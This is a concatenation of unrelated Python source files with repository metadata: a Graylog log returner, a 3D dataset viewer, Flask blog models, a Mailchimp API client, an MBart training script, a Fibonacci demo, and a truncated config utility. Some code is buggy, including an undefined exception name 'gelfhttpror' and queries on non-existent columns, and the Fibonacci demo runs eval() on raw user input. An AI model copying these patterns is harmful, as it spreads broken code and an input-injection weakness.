|
978502ad6a23b5f493efdd1da35eb74eaf6dd73b
| 5,691
|
py
|
Python
|
hubblestack/extmods/returners/graylog_nebula_return.py
|
NerdsvilleCEO/hubble
|
200dc8bc2075da5753b2424f1597d806a4139d41
|
[
"Apache-2.0"
] | null | null | null |
hubblestack/extmods/returners/graylog_nebula_return.py
|
NerdsvilleCEO/hubble
|
200dc8bc2075da5753b2424f1597d806a4139d41
|
[
"Apache-2.0"
] | null | null | null |
hubblestack/extmods/returners/graylog_nebula_return.py
|
NerdsvilleCEO/hubble
|
200dc8bc2075da5753b2424f1597d806a4139d41
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
'''
HubbleStack Nebula-to-graylog (http input) returner
Deliver HubbleStack Nebula query data into graylog using the HTTP input
plugin. Required config/pillar settings:
.. code-block:: yaml
hubblestack:
returner:
graylog:
- port: 12202
proxy: {}
timeout: 10
gelfhttp_ssl: True
sourcetype_nebula: hubble_osquery
sourcetype_pulsar: hubble_fim
sourcetype_nova: hubble_audit
gelfhttp: http://graylog-gelf-http-input-addr
'''
import json
import time
import requests
from datetime import datetime
def returner(ret):
'''
'''
opts_list = _get_options()
# Get cloud details
cloud_details = __grains__.get('cloud_details', {})
for opts in opts_list:
proxy = opts['proxy']
timeout = opts['timeout']
custom_fields = opts['custom_fields']
gelfhttp = opts['gelfhttp']
port = opts['port']
# assign all the things
data = ret['return']
minion_id = ret['id']
jid = ret['jid']
master = __grains__['master']
fqdn = __grains__['fqdn']
fqdn = fqdn if fqdn else minion_id
try:
fqdn_ip4 = __grains__['fqdn_ip4'][0]
except gelfhttpror:
fqdn_ip4 = __grains__['ipv4'][0]
if fqdn_ip4.startswith('127.'):
for ip4_addr in __grains__['ipv4']:
if ip4_addr and not ip4_addr.startswith('127.'):
fqdn_ip4 = ip4_addr
break
if not data:
return
else:
for query in data:
for query_name, query_results in query.iteritems():
for query_result in query_results['data']:
event = {}
payload = {}
event.update(query_result)
event.update({'query': query_name})
event.update({'job_id': jid})
event.update({'master': master})
event.update({'minion_id': minion_id})
event.update({'dest_host': fqdn})
event.update({'dest_ip': fqdn_ip4})
event.update(cloud_details)
for custom_field in custom_fields:
custom_field_name = 'custom_' + custom_field
custom_field_value = __salt__['config.get'](custom_field, '')
if isinstance(custom_field_value, str):
event.update({custom_field_name: custom_field_value})
elif isinstance(custom_field_value, list):
custom_field_value = ','.join(custom_field_value)
event.update({custom_field_name: custom_field_value})
payload.update({'host': fqdn})
payload.update({'_sourcetype': opts['sourcetype']})
payload.update({'short_message': 'hubblestack'})
payload.update({'hubblemsg': event})
# If the osquery query includes a field called 'time' it will be checked.
# If it's within the last year, it will be used as the eventtime.
event_time = query_result.get('time', '')
try:
if (datetime.fromtimestamp(time.time()) - datetime.fromtimestamp(float(event_time))).days > 365:
event_time = ''
except:
event_time = ''
finally:
rdy = json.dumps(payload)
requests.post('{}:{}/gelf'.format(gelfhttp, port), rdy)
return
def _get_options():
if __salt__['config.get']('hubblestack:returner:graylog'):
graylog_opts = []
returner_opts = __salt__['config.get']('hubblestack:returner:graylog')
if not isinstance(returner_opts, list):
returner_opts = [returner_opts]
for opt in returner_opts:
processed = {}
processed['gelfhttp'] = opt.get('gelfhttp')
processed['port'] = str(opt.get('port', '12022'))
processed['custom_fields'] = opt.get('custom_fields', [])
processed['sourcetype'] = opt.get('sourcetype_nebula', 'hubble_osquery')
processed['gelfhttp_ssl'] = opt.get('gelfhttp_ssl', True)
processed['proxy'] = opt.get('proxy', {})
processed['timeout'] = opt.get('timeout', 9.05)
graylog_opts.append(processed)
return graylog_opts
else:
try:
port = __salt__['config.get']('hubblestack:returner:graylog:port')
gelfhttp = __salt__['config.get']('hubblestack:returner:graylog:gelfhttp')
sourcetype = __salt__['config.get']('hubblestack:nebula:returner:graylog:sourcetype')
custom_fields = __salt__['config.get']('hubblestack:nebula:returner:graylog:custom_fields', [])
except:
return None
graylog_opts = {'gelfhttp': gelfhttp, 'sourcetype': sourcetype, 'custom_fields': custom_fields}
gelfhttp_ssl = __salt__['config.get']('hubblestack:nebula:returner:graylog:gelfhttp_ssl', True)
graylog_opts['http_input_server_ssl'] = gelfhttp_ssl
graylog_opts['proxy'] = __salt__['config.get']('hubblestack:nebula:returner:graylog:proxy', {})
graylog_opts['timeout'] = __salt__['config.get']('hubblestack:nebula:returner:graylog:timeout', 9.05)
return [graylog_opts]
| 40.077465
| 124
| 0.549464
|
4fa841d400a47a4f11331889867f11c025ddb3da
| 1,379
|
py
|
Python
|
tensorflow_graphics/datasets/modelnet40/modelnet40_show.py
|
jackd/graphics
|
736b99a3306e302674a9b7599e3e2857b85fdb74
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_graphics/datasets/modelnet40/modelnet40_show.py
|
jackd/graphics
|
736b99a3306e302674a9b7599e3e2857b85fdb74
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_graphics/datasets/modelnet40/modelnet40_show.py
|
jackd/graphics
|
736b99a3306e302674a9b7599e3e2857b85fdb74
|
[
"Apache-2.0"
] | 1
|
2020-04-11T10:37:36.000Z
|
2020-04-11T10:37:36.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Visualization in 3D of modelnet40 dataset.
See: https://www.tensorflow.org/datasets/api_docs/python/tfds/load
"""
from absl import app
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D # pylint:disable=unused-import
from tensorflow_graphics.datasets.modelnet40 import ModelNet40
def main(_):
ds_train, _ = ModelNet40.load(
split="train", data_dir="~/tensorflow_dataset", with_info=True)
for example in ds_train.take(1):
points = example["points"]
label = example["label"]
fig = plt.figure()
ax3 = fig.add_subplot(111, projection="3d")
ax3.set_title("Example with label {}".format(label))
scatter3 = lambda p, c="r", *args: ax3.scatter(p[:, 0], p[:, 1], p[:, 2], c)
scatter3(points)
if __name__ == "__main__":
app.run(main)
| 32.833333
| 78
| 0.730239
|
9b42abf44bc80c7834b7b555428a7a7433294b2b
| 4,460
|
py
|
Python
|
app/models.py
|
dan-jugz/stranger-blogs
|
78dcfff2cb8f40a0e6fa079f14afbb7850f4ae18
|
[
"MIT"
] | null | null | null |
app/models.py
|
dan-jugz/stranger-blogs
|
78dcfff2cb8f40a0e6fa079f14afbb7850f4ae18
|
[
"MIT"
] | null | null | null |
app/models.py
|
dan-jugz/stranger-blogs
|
78dcfff2cb8f40a0e6fa079f14afbb7850f4ae18
|
[
"MIT"
] | null | null | null |
from . import db
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return Writer.query.get(int(user_id))
class Writer(UserMixin,db.Model):
"""
This class allows us to have a writers table that has the following columns:
1. id
2. writer_name
3. email
4. password
5. writer_blog
"""
__tablename__ = 'writers'
id = db.Column(db.Integer, primary_key=True)
writer_name = db.Column(db.String(50))
email = db.Column(db.String(64),unique=True,index=True)
profile_image=db.Column(db.String(64),default='default_profile.png')
password_hash = db.Column(db.String(255))
writer_blog = db.relationship('Blog', backref="writer", lazy='dynamic')
comments_user=db.relationship('Comment',backref='commenter',lazy="dynamic")
subscriber_id=db.relationship('Subscriber',backref='writer',lazy='dynamic')
@property
def password(self):
raise AttributeError('Access denied')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def __repr__(self):
return "Writer {}".format(self.writer_name)
class Blog(db.Model):
"""
This class allows to create blogs table that will have the following columns:
1. id
2. title
3. body
4. posted_at
5. writer_id
5. posted_by
6. writer_url
7. comment_id
"""
__tablename__ = 'blogs'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String)
body = db.Column(db.String)
posted_at = db.Column(db.DateTime, default=datetime.utcnow)
writer_id = db.Column(db.Integer, db.ForeignKey('writers.id'))
writer_url = db.Column(db.String)
posted_by = db.Column(db.String)
comment_id = db.relationship('Comment', backref="comment_ids", lazy="dynamic")
def save_blog(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_posts(cls):
'''
Function that fetches all blog posts regardless of the writer
'''
posts=Blog.query.order_by(Blog.posted_at.desc()).all()
return posts
@classmethod
def get_user_posts(cls,writer_id,page):
'''
Function that fetches all blog posts for a single writer
'''
posts_user=Blog.query.filter_by(author=writer_id).order_by(Blog.date.desc()).paginate(page=page,per_page=5)
return posts_user
def __repr__(self):
return f'PostID:{self.id}--Date{self.date}--Title{self.title}'
class Comment(db.Model):
"""
This class helps us to be able to create a comments table that has:
1. id column
2. comment column
3. commented_on column
4. blog_id column
"""
__tablename = 'comments'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String)
comment = db.Column(db.String)
commented_on = db.Column(db.DateTime, default=datetime.utcnow)
blog_id = db.Column(db.Integer, db.ForeignKey('blogs.id'))
writer_id = db.Column(db.Integer, db.ForeignKey('writers.id'))
def save_comment(self):
db.session.add(self)
db.session.commit()
def save_comment(self):
'''
Function that saves a new comment
'''
db.session.add(self)
db.session.commit()
@classmethod
def get_comments(cls,blog_id):
'''
Function that fetches a specific post comment
'''
comments=Comment.query.filter_by(blog_id=blog_id).all()
return comments
class Quote:
"""
This class helps to design Quotes data to have:
1. quote
2. author
"""
def __init__(self, quote, author):
"""
This method allows us to instantiate an instance.
"""
self.quote = quote
self.author = author
class Subscriber(db.Model):
__tablename__ = "subscribers"
id = db.Column(db.Integer, primary_key=True)
subscriber = db.Column(db.String(12))
writer_id = db.Column(db.Integer, db.ForeignKey('writers.id'))
email = db.Column(db.String)
| 28.961039
| 116
| 0.640583
|
2bd9e3beb5ccb0ef861e6d145c0fae5b73df37e7
| 6,076
|
py
|
Python
|
mailchimp_transactional/api/metadata_api.py
|
mailchimp/mailchimp-transactional-python
|
13984adc51f8a91a08c8b282d25c6752ba0375c4
|
[
"Apache-2.0"
] | 21
|
2020-08-31T16:24:14.000Z
|
2022-03-16T17:18:36.000Z
|
build/lib/mailchimp_transactional/api/metadata_api.py
|
mailchimp/mailchimp-transactional-python
|
13984adc51f8a91a08c8b282d25c6752ba0375c4
|
[
"Apache-2.0"
] | null | null | null |
build/lib/mailchimp_transactional/api/metadata_api.py
|
mailchimp/mailchimp-transactional-python
|
13984adc51f8a91a08c8b282d25c6752ba0375c4
|
[
"Apache-2.0"
] | 5
|
2021-02-02T10:17:43.000Z
|
2022-01-21T15:49:38.000Z
|
# coding: utf-8
"""
Mailchimp Transactional API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0.46
Contact: apihelp@mailchimp.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from mailchimp_transactional.api_client import ApiClient
class MetadataApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_key='', api_client = None):
self.api_key = api_key
if api_client:
self.api_client = api_client
else:
self.api_client = ApiClient()
def add(self, body = {}, **kwargs): # noqa: E501
"""Add metadata field # noqa: E501
Add a new custom metadata field to be indexed for the account. # noqa: E501
"""
(data) = self.add_with_http_info(body, **kwargs) # noqa: E501
return data
def add_with_http_info(self, body, **kwargs): # noqa: E501
"""Add metadata field # noqa: E501
Add a new custom metadata field to be indexed for the account. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/add', 'POST',
body=body_params,
response_type='InlineResponse20037') # noqa: E501
def delete(self, body = {}, **kwargs): # noqa: E501
"""Delete metadata field # noqa: E501
Delete an existing custom metadata field. Deletion isn't instataneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete. # noqa: E501
"""
(data) = self.delete_with_http_info(body, **kwargs) # noqa: E501
return data
def delete_with_http_info(self, body, **kwargs): # noqa: E501
"""Delete metadata field # noqa: E501
Delete an existing custom metadata field. Deletion isn't instataneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/delete', 'POST',
body=body_params,
response_type='InlineResponse20039') # noqa: E501
def list(self, body = {}, **kwargs): # noqa: E501
"""List metadata fields # noqa: E501
Get the list of custom metadata fields indexed for the account. # noqa: E501
"""
(data) = self.list_with_http_info(body, **kwargs) # noqa: E501
return data
def list_with_http_info(self, body, **kwargs): # noqa: E501
"""List metadata fields # noqa: E501
Get the list of custom metadata fields indexed for the account. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/list', 'POST',
body=body_params,
response_type='list[InlineResponse20036]') # noqa: E501
def update(self, body = {}, **kwargs): # noqa: E501
"""Update metadata field # noqa: E501
Update an existing custom metadata field. # noqa: E501
"""
(data) = self.update_with_http_info(body, **kwargs) # noqa: E501
return data
def update_with_http_info(self, body, **kwargs): # noqa: E501
"""Update metadata field # noqa: E501
Update an existing custom metadata field. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/metadata/update', 'POST',
body=body_params,
response_type='InlineResponse20038') # noqa: E501
| 32.319149
| 198
| 0.575379
|
5457fa57e968e2791493b86cae1a857dac960e8b
| 14,176
|
py
|
Python
|
examples/seq2seq/finetune_trainer_base (2).py
|
Eymen3455/transformers
|
f6960bb82015b15b10e5dcea71fd43dc1e73e0b3
|
[
"Apache-2.0"
] | 1
|
2021-01-11T19:59:56.000Z
|
2021-01-11T19:59:56.000Z
|
examples/seq2seq/finetune_trainer_base (2).py
|
Eymen3455/transformers
|
f6960bb82015b15b10e5dcea71fd43dc1e73e0b3
|
[
"Apache-2.0"
] | null | null | null |
examples/seq2seq/finetune_trainer_base (2).py
|
Eymen3455/transformers
|
f6960bb82015b15b10e5dcea71fd43dc1e73e0b3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import transformers
from transformers import (
AutoConfig,
AutoModelForSeq2SeqLM,
AutoTokenizer,
HfArgumentParser,
MBartTokenizer,
MBartForConditionalGeneration,
MBartConfig,
Seq2SeqTrainer,
Seq2SeqTrainingArguments,
set_seed,
MBartModel,
)
from transformers.trainer_utils import EvaluationStrategy, is_main_process
from transformers.training_args import ParallelMode
from utils import (
Seq2SeqDataCollator,
Seq2SeqDataset,
assert_all_frozen,
build_compute_metrics_fn,
check_output_dir,
freeze_embeds,
freeze_params,
lmap,
save_json,
use_task_specific_params,
write_txt_file,
)
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
freeze_encoder: bool = field(default=False, metadata={"help": "Whether tp freeze the encoder."})
freeze_embeds: bool = field(default=False, metadata={"help": "Whether to freeze the embeddings."})
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
data_dir: str = field(
metadata={"help": "The input data dir. Should contain the .tsv files (or other data files) for the task."}
)
task: Optional[str] = field(
default="summarization",
metadata={"help": "Task name, summarization (or summarization_{dataset} for pegasus) or translation"},
)
max_source_length: Optional[int] = field(
default=1024,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
max_target_length: Optional[int] = field(
default=128,
metadata={
"help": "The maximum total sequence length for target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
val_max_target_length: Optional[int] = field(
default=142,
metadata={
"help": "The maximum total sequence length for validation target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded. "
"This argument is also used to override the ``max_length`` param of ``model.generate``, which is used "
"during ``evaluate`` and ``predict``."
},
)
test_max_target_length: Optional[int] = field(
default=142,
metadata={
"help": "The maximum total sequence length for test target text after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
n_train: Optional[int] = field(default=-1, metadata={"help": "# training examples. -1 means use all."})
n_val: Optional[int] = field(default=-1, metadata={"help": "# validation examples. -1 means use all."})
n_test: Optional[int] = field(default=-1, metadata={"help": "# test examples. -1 means use all."})
src_lang: Optional[str] = field(default=None, metadata={"help": "Source language id for translation."})
tgt_lang: Optional[str] = field(default=None, metadata={"help": "Target language id for translation."})
eval_beams: Optional[int] = field(default=None, metadata={"help": "# num_beams to use for evaluation."})
ignore_pad_token_for_loss: bool = field(
default=True,
metadata={"help": "If only pad tokens should be ignored. This assumes that `config.pad_token_id` is defined."},
)
def handle_metrics(split, metrics, output_dir):
"""
Log and save metrics
Args:
- split: one of train, val, test
- metrics: metrics dict
- output_dir: where to save the metrics
"""
logger.info(f"***** {split} metrics *****")
for key in sorted(metrics.keys()):
logger.info(f" {key} = {metrics[key]}")
save_json(metrics, os.path.join(output_dir, f"{split}_results.json"))
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, Seq2SeqTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
check_output_dir(training_args)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.parallel_mode == ParallelMode.DISTRIBUTED),
training_args.fp16,
)
# Set the verbosity to info of the Transformers logger (on main process only):
if is_main_process(training_args.local_rank):
transformers.utils.logging.set_verbosity_info()
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = MBartConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
extra_model_params = ("encoder_layerdrop", "decoder_layerdrop", "dropout", "attention_dropout")
for p in extra_model_params:
if getattr(training_args, p, None):
assert hasattr(config, p), f"({config.__class__.__name__}) doesn't have a `{p}` attribute"
setattr(config, p, getattr(training_args, p))
tokenizer = MBartTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
# model = MBartForConditionalGeneration.from_pretrained(
# model_args.model_name_or_path,
# from_tf=".ckpt" in model_args.model_name_or_path,
# config=config,
# cache_dir=model_args.cache_dir,
# )
# model = MBartForConditionalGeneration(config)
# model = MBartForConditionalGeneration.from_pretrained(model_args.config_name)
model_config = MBartConfig(vocab_size=300,d_model=10,encoder_layers=1,decoder_layers=1,encoder_attention_heads=1,decoder_attention_heads=1,encoder_ffn_dim=10,decoder_ffn_dim=10,max_position_embeddings=512)
model = MBartModel(config=model_config)
# use task specific params
use_task_specific_params(model, data_args.task)
# set num_beams for evaluation
if data_args.eval_beams is None:
data_args.eval_beams = model.config.num_beams
# set decoder_start_token_id for MBart
if model.config.decoder_start_token_id is None and isinstance(tokenizer, MBartTokenizer):
assert (
data_args.tgt_lang is not None and data_args.src_lang is not None
), "mBart requires --tgt_lang and --src_lang"
model.config.decoder_start_token_id = tokenizer.lang_code_to_id[data_args.tgt_lang]
if model_args.freeze_embeds:
freeze_embeds(model)
if model_args.freeze_encoder:
freeze_params(model.get_encoder())
assert_all_frozen(model.get_encoder())
dataset_class = Seq2SeqDataset
# Get datasets
train_dataset = (
dataset_class(
tokenizer,
type_path="train",
data_dir=data_args.data_dir,
n_obs=data_args.n_train,
max_target_length=data_args.max_target_length,
max_source_length=data_args.max_source_length,
prefix=model.config.prefix or "",
)
if training_args.do_train
else None
)
eval_dataset = (
dataset_class(
tokenizer,
type_path="val",
data_dir=data_args.data_dir,
n_obs=data_args.n_val,
max_target_length=data_args.val_max_target_length,
max_source_length=data_args.max_source_length,
prefix=model.config.prefix or "",
)
if training_args.do_eval or training_args.evaluation_strategy != EvaluationStrategy.NO
else None
)
test_dataset = (
dataset_class(
tokenizer,
type_path="test",
data_dir=data_args.data_dir,
n_obs=data_args.n_test,
max_target_length=data_args.test_max_target_length,
max_source_length=data_args.max_source_length,
prefix=model.config.prefix or "",
)
if training_args.do_predict
else None
)
# Initialize our Trainer
compute_metrics_fn = (
build_compute_metrics_fn(data_args.task, tokenizer) if training_args.predict_with_generate else None
)
trainer = Seq2SeqTrainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
data_collator=Seq2SeqDataCollator(tokenizer, data_args, training_args.tpu_num_cores),
compute_metrics=compute_metrics_fn,
tokenizer=tokenizer,
)
all_metrics = {}
# Training
if training_args.do_train:
logger.info("*** Train ***")
train_result = trainer.train(
model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None
)
metrics = train_result.metrics
metrics["train_n_objs"] = data_args.n_train
trainer.save_model() # this also saves the tokenizer
if trainer.is_world_process_zero():
handle_metrics("train", metrics, training_args.output_dir)
all_metrics.update(metrics)
# Need to save the state, since Trainer.save_model saves only the tokenizer with the model
trainer.state.save_to_json(os.path.join(training_args.output_dir, "trainer_state.json"))
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
tokenizer.save_pretrained(training_args.output_dir)
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate(
metric_key_prefix="val", max_length=data_args.val_max_target_length, num_beams=data_args.eval_beams
)
metrics["val_n_objs"] = data_args.n_val
metrics["val_loss"] = round(metrics["val_loss"], 4)
if trainer.is_world_process_zero():
handle_metrics("val", metrics, training_args.output_dir)
all_metrics.update(metrics)
if training_args.do_predict:
logger.info("*** Predict ***")
test_output = trainer.predict(
test_dataset=test_dataset,
metric_key_prefix="test",
max_length=data_args.val_max_target_length,
num_beams=data_args.eval_beams,
)
metrics = test_output.metrics
metrics["test_n_objs"] = data_args.n_test
if trainer.is_world_process_zero():
metrics["test_loss"] = round(metrics["test_loss"], 4)
handle_metrics("test", metrics, training_args.output_dir)
all_metrics.update(metrics)
if training_args.predict_with_generate:
test_preds = tokenizer.batch_decode(
test_output.predictions, skip_special_tokens=True, clean_up_tokenization_spaces=True
)
test_preds = lmap(str.strip, test_preds)
write_txt_file(test_preds, os.path.join(training_args.output_dir, "test_generations.txt"))
if trainer.is_world_process_zero():
save_json(all_metrics, os.path.join(training_args.output_dir, "all_results.json"))
return all_metrics
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
| 37.802667
| 209
| 0.677836
|
12ded5fe094fb1c68f085cd3c2be731d8234008d
| 1,825
|
py
|
Python
|
dynamic_programming/fibonacci.py
|
srivama/Python
|
809d4c077c179feb077f09a3cd2501f9724366a2
|
[
"MIT"
] | null | null | null |
dynamic_programming/fibonacci.py
|
srivama/Python
|
809d4c077c179feb077f09a3cd2501f9724366a2
|
[
"MIT"
] | null | null | null |
dynamic_programming/fibonacci.py
|
srivama/Python
|
809d4c077c179feb077f09a3cd2501f9724366a2
|
[
"MIT"
] | null | null | null |
"""
This is a pure Python implementation of Dynamic Programming solution to the Fibonacci sequence problem.
"""
from __future__ import print_function
class Fibonacci:
def __init__(self, N=None):
self.fib_array = []
if N:
N = int(N)
self.fib_array.append(0)
self.fib_array.append(1)
for i in range(2, N + 1):
self.fib_array.append(
self.fib_array[i - 1] + self.fib_array[i - 2])
elif N == 0:
self.fib_array.append(0)
def get(self, sequence_no=None):
if sequence_no != None:
if sequence_no < len(self.fib_array):
return print(self.fib_array[:sequence_no + 1])
else:
print("Out of bound.")
else:
print("Please specify a value")
if __name__ == '__main__':
print("\n********* Fibonacci Series Using Dynamic Programming ************\n")
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
print("\n Enter the upper limit for the fibonacci sequence: ", end="")
try:
N = eval(raw_input().strip())
fib = Fibonacci(N)
print(
"\n********* Enter different values to get the corresponding fibonacci sequence, enter any negative number to exit. ************\n")
while True:
print("Enter value: ", end=" ")
try:
i = eval(raw_input().strip())
if i < 0:
print("\n********* Good Bye!! ************\n")
break
fib.get(i)
except NameError:
print("\nInvalid input, please try again.")
except NameError:
print("\n********* Invalid input, good bye!! ************\n")
| 32.589286
| 144
| 0.505753
|
34adf18944b161addb545aa6c40fcb69097d708f
| 19,261
|
py
|
Python
|
pypeit/par/util.py
|
joshwalawender/PypeIt
|
f952cbb2aaee640b5c585be823884a237b441e8e
|
[
"BSD-3-Clause"
] | null | null | null |
pypeit/par/util.py
|
joshwalawender/PypeIt
|
f952cbb2aaee640b5c585be823884a237b441e8e
|
[
"BSD-3-Clause"
] | null | null | null |
pypeit/par/util.py
|
joshwalawender/PypeIt
|
f952cbb2aaee640b5c585be823884a237b441e8e
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Utility functions for PypeIt parameter sets
"""
import os
import time
import glob
import warnings
import textwrap
from IPython import embed
import numpy as np
from astropy.table import Table
from configobj import ConfigObj
from pypeit import msgs
from IPython import embed
#-----------------------------------------------------------------------
# Parameter utility functions
#-----------------------------------------------------------------------
def _eval_ignore():
"""Provides a list of strings that should not be evaluated."""
return [ 'open', 'file', 'dict', 'list', 'tuple' ]
def recursive_dict_evaluate(d):
"""
Recursively run :func:`eval` on each element of the provided
dictionary.
A raw read of a configuration file with `ConfigObj` results in a
dictionary that contains strings or lists of strings. However, when
assigning the values for the various ParSets, the `from_dict`
methods expect the dictionary values to have the appropriate type.
E.g., the ConfigObj will have something like d['foo'] = '1', when
the `from_dict` method expects the value to be an integer (d['foo']
= 1).
This function tries to evaluate *all* dictionary values, except for
those listed above in the :func:`_eval_ignore` function. Any value
in this list or where::
eval(d[k]) for k in d.keys()
raises an exception is returned as the original string.
This is currently only used in :func:`PypitPar.from_cfg_file`; see
further comments there.
Args:
d (dict):
Dictionary of values to evaluate
Returns:
dict: Identical to input dictionary, but with all string values
replaced with the result of `eval(d[k])` for all `k` in
`d.keys()`.
"""
ignore = _eval_ignore()
for k in d.keys():
if isinstance(d[k], dict):
d[k] = recursive_dict_evaluate(d[k])
elif isinstance(d[k], list):
replacement = []
for v in d[k]:
if v in ignore:
replacement += [ v ]
else:
try:
replacement += [ eval(v) ]
except:
replacement += [ v ]
d[k] = replacement
else:
try:
d[k] = eval(d[k]) if d[k] not in ignore else d[k]
except:
pass
return d
def get_parset_list(cfg, pk, parsetclass):
"""
Create a list of ParSets based on a root keyword for a set of
defined groups in the configuration file.
For example, the :class:`InstrumentPar` group allows for a list of
detectors (:class:`DetectorPar`) with keywords like `detector1`,
`detector2`, etc. This function parses the provided configuration
object (`cfg`) to find any sections with `detector` (`pk`) as its
root. The remainder of the section name must be able to be
converted to an integer and the section itself must be able to setup
an instance of `parsetclass`. The sections must be number
sequentially from 1..N. E.g., the :class:`InstrumentPar`
configuration file cannot have `dectector1` and `detector3`, but no
`detector2`. The call to setup the detectors in the
:class:`InstrumentPar` is::
